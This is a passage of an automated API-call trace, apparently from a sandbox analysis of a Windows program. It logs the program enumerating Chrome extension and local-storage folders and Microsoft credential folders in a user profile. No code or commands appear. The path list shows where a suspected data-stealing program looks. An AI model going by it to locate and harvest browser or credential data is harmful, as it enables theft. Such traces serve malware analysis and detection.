hHeap=0x20f0000) returned 1 [0154.653] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0154.659] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0154.659] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.659] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0154.664] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0154.664] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.664] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0154.671] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0154.671] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.671] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0154.700] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0154.701] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.701] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sk\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0154.707] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0154.707] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.707] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sl\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32da8 [0154.707] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0154.708] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.708] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0154.711] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0154.711] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.711] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0154.711] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0154.711] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.711] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0154.712] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0154.712] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.712] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa327e8 [0154.712] FindClose (in: hFindFile=0xa327e8 | out: hFindFile=0xa327e8) returned 1 [0154.712] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.712] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32de8 [0154.919] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0154.919] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.919] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32de8 [0154.919] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0154.919] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.920] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32e28 [0154.960] FindClose (in: hFindFile=0xa32e28 | out: hFindFile=0xa32e28) returned 1 [0154.960] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.960] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32e28 [0154.960] FindClose (in: hFindFile=0xa32e28 | out: hFindFile=0xa32e28) returned 1 [0154.961] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.961] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d68 [0154.994] FindClose (in: hFindFile=0xa32d68 | out: hFindFile=0xa32d68) returned 1 [0154.994] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.994] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d68 [0154.995] FindClose (in: hFindFile=0xa32d68 | out: hFindFile=0xa32d68) returned 1 [0154.995] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.995] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\*", lpFindFileData=0x2b4d844 | out: lpFindFileData=0x2b4d844) returned 0xa32d68 [0154.996] FindClose (in: hFindFile=0xa32d68 | out: hFindFile=0xa32d68) returned 1 [0154.996] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33e00e0 | out: hHeap=0x20f0000) returned 1 [0154.996] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0154.997] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0154.997] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\*", lpFindFileData=0x2b4dac8 | out: lpFindFileData=0x2b4dac8) returned 0xa32968 [0154.998] FindClose (in: hFindFile=0xa32968 | out: hFindFile=0xa32968) returned 1 [0154.998] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33d00d8 | out: hHeap=0x20f0000) returned 1 [0154.998] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0154.998] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0154.998] FindClose (in: hFindFile=0xa32ce8 | out: hFindFile=0xa32ce8) returned 1 [0154.998] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0155.000] FindClose (in: hFindFile=0xa32ca8 | out: hFindFile=0xa32ca8) returned 1 [0155.000] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0155.000] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\*", lpFindFileData=0x2b4e254 | out: lpFindFileData=0x2b4e254) returned 0xa32ca8 [0155.001] FindClose (in: hFindFile=0xa32ca8 | out: hFindFile=0xa32ca8) returned 1 [0155.001] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0155.001] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\*", lpFindFileData=0x2b4e254 | out: lpFindFileData=0x2b4e254) returned 0xa32ca8 [0155.002] FindClose (in: hFindFile=0xa32ca8 | out: hFindFile=0xa32ca8) returned 1 [0155.002] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0155.002] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\*", lpFindFileData=0x2b4e254 | out: lpFindFileData=0x2b4e254) returned 0xa32ca8 [0155.002] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\*", lpFindFileData=0x2b4dfd0 | out: lpFindFileData=0x2b4dfd0) returned 0xa32d28 [0155.117] FindClose (in: hFindFile=0xa32d28 | out: hFindFile=0xa32d28) returned 1 [0155.118] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0155.118] FindClose (in: hFindFile=0xa32ca8 | out: hFindFile=0xa32ca8) returned 1 [0155.119] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0155.119] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\*", lpFindFileData=0x2b4e254 | out: lpFindFileData=0x2b4e254) returned 0xa32ca8 [0155.211] FindClose (in: hFindFile=0xa32ca8 | out: hFindFile=0xa32ca8) returned 1 [0155.211] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0155.212] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\*", lpFindFileData=0x2b4e254 | out: lpFindFileData=0x2b4e254) returned 0xa32ca8 [0155.212] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\*", lpFindFileData=0x2b4dfd0 | out: lpFindFileData=0x2b4dfd0) returned 0xa32da8 [0155.315] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0155.316] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0155.316] FindClose (in: hFindFile=0xa32ca8 | out: hFindFile=0xa32ca8) returned 1 [0155.316] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0155.316] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\*", lpFindFileData=0x2b4e254 | out: lpFindFileData=0x2b4e254) returned 0xa32ca8 [0155.316] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\*", lpFindFileData=0x2b4dfd0 | out: lpFindFileData=0x2b4dfd0) returned 0xa32da8 [0155.317] FindClose (in: hFindFile=0xa32da8 | out: hFindFile=0xa32da8) returned 1 [0155.317] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0155.317] FindClose (in: hFindFile=0xa32ca8 | out: hFindFile=0xa32ca8) returned 1 [0155.317] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0155.317] FindClose (in: hFindFile=0xa32c68 | out: hFindFile=0xa32c68) returned 1 [0155.317] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0155.317] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\*", lpFindFileData=0x2b4e4d8 | out: lpFindFileData=0x2b4e4d8) returned 0xa32de8 [0155.607] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0155.607] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0155.607] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\*", lpFindFileData=0x2b4e4d8 | out: lpFindFileData=0x2b4e4d8) returned 0xa32de8 [0155.607] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0155.607] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0155.607] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\*", lpFindFileData=0x2b4e4d8 | out: lpFindFileData=0x2b4e4d8) returned 0xa32de8 [0155.607] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0155.608] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0155.608] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\*", lpFindFileData=0x2b4e4d8 | out: lpFindFileData=0x2b4e4d8) returned 0xa32de8 [0155.608] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0155.608] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0155.608] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\*", lpFindFileData=0x2b4e4d8 | out: lpFindFileData=0x2b4e4d8) returned 0xa32de8 [0155.608] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0155.608] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0155.608] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\*", lpFindFileData=0x2b4e4d8 | out: lpFindFileData=0x2b4e4d8) returned 0xa32de8 [0155.609] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0155.609] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0155.609] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\*", lpFindFileData=0x2b4e4d8 | out: lpFindFileData=0x2b4e4d8) returned 0xa32de8 [0155.610] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0155.610] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0155.610] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\*", lpFindFileData=0x2b4e4d8 | out: lpFindFileData=0x2b4e4d8) returned 0xa32de8 [0155.610] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0155.610] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0155.610] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0155.610] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33c00d0 | out: hHeap=0x20f0000) returned 1 [0155.612] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0155.613] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33b00c8 | out: hHeap=0x20f0000) returned 1 [0155.613] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\CrashReports\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32aa8 [0155.614] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0155.614] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0155.615] FindClose (in: hFindFile=0xa32a68 | out: hFindFile=0xa32a68) returned 1 [0155.615] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33a00c0 | out: hHeap=0x20f0000) returned 1 [0155.616] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xffffffff [0155.616] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x32f0068 | out: hHeap=0x20f0000) returned 1 [0155.619] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\*", lpFindFileData=0x2b4ec64 | out: lpFindFileData=0x2b4ec64) returned 0xa32a68 [0155.619] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Credentials\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32aa8 [0155.619] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0155.619] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0155.619] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Event Viewer\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32aa8 [0155.619] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0155.619] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0155.620] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32aa8 [0155.643] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\*", lpFindFileData=0x2b4e75c | out: lpFindFileData=0x2b4e75c) returned 0xa32ae8 [0155.729] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0155.730] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0155.730] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*", lpFindFileData=0x2b4e75c | out: lpFindFileData=0x2b4e75c) returned 0xa32ae8 [0155.736] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*", lpFindFileData=0x2b4e4d8 | out: lpFindFileData=0x2b4e4d8) returned 0xa32de8 [0155.737] FindClose (in: hFindFile=0xa32de8 | out: hFindFile=0xa32de8) returned 1 [0155.737] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33900b8 | out: hHeap=0x20f0000) returned 1 [0155.737] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0155.737] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0155.738] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0155.738] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0155.739] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32aa8 [0155.741] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\*", lpFindFileData=0x2b4e75c | out: lpFindFileData=0x2b4e75c) returned 0xa32ae8 [0155.741] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0155.741] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0155.741] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\*", lpFindFileData=0x2b4e75c | out: lpFindFileData=0x2b4e75c) returned 0xa32ae8 [0155.741] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0155.741] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0155.741] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\*", lpFindFileData=0x2b4e75c | out: lpFindFileData=0x2b4e75c) returned 0xa32ae8 [0155.742] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0155.742] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0155.742] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\*", lpFindFileData=0x2b4e75c | out: lpFindFileData=0x2b4e75c) returned 0xa32ae8 [0155.742] FindClose (in: hFindFile=0xa32ae8 | out: hFindFile=0xa32ae8) returned 1 [0155.742] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3310078 | out: hHeap=0x20f0000) returned 1 [0155.742] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0155.742] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0155.742] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32aa8 [0155.743] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0155.743] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0155.744] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IME12\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32aa8 [0155.744] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 [0155.744] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x3300070 | out: hHeap=0x20f0000) returned 1 [0155.744] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP12\\*", lpFindFileData=0x2b4e9e0 | out: lpFindFileData=0x2b4e9e0) returned 0xa32aa8 [0155.745] FindClose (in: hFindFile=0xa32aa8 | out: hFindFile=0xa32aa8) returned 1 